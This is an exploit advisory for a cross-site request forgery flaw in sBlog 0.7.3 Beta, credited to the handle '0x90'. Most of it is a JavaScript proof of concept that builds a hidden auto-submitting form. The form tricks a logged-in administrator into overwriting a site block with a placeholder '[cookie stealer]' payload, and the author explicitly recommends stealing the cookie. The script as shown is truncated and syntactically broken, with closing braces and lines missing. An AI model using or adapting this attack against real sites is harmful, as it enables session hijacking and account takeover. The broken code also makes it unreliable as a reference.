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sBlog 0.7.3 Beta Cross Site Request Forgery

- Product : sBlog 
- Version : 0.7.3 Beta
- Website : http://www.sblog.se
- Author  : 0x90
- Homepage: WwW.0x90.CoM.Ar 
- Contact : Guns[at]0x90[dot]com[dot]ar    
- Problem : Cross Site Request Forgery Vulnerability
- Sumary  : sBlog has, by default, no CSRF protection, this may allow an 
to change any block by tricking a victim with admin privileges 
into a special forged web page (even in a a totally different server)
that sends a request to change one block in the web. The
victim does not know that the form was sent. If the victim has admin
privileges the exploit will succeed, otherwise nothing will happen. 
- Note    : I recommend steal the cookie ;)
- Greetz  : xiam ;)  Visit: xiam.be

<script type="text/javascript">
window.onload = function() {
   var url = "http://[URL]/blocks_edit_do.php";;

   var bid = [block id];
   var topic = [name block];
   var content = [cookie stealer];

   var param = {
   id: bid,
   block_topic: topic,
   block_content: content,
   block_vis: 1,
   block_style: 1,
   block_top: 1

   var form = document.createElement('form');
   form.action = url;
   form.method = 'post';
   form.target = 'hidden';
   form.style.display = 'none';

   for (var i in param) {
       try {
           // ie
           var input = document.createElement('<input name="'+i+'">');
       } catch(e) {
           // other browsers 
           var input = document.createElement('input');
           input.name = i;
       input.setAttribute('value',  param[i]);
       form.appendChild (input);


<iframe name="hidden" style="display: none"></iframe>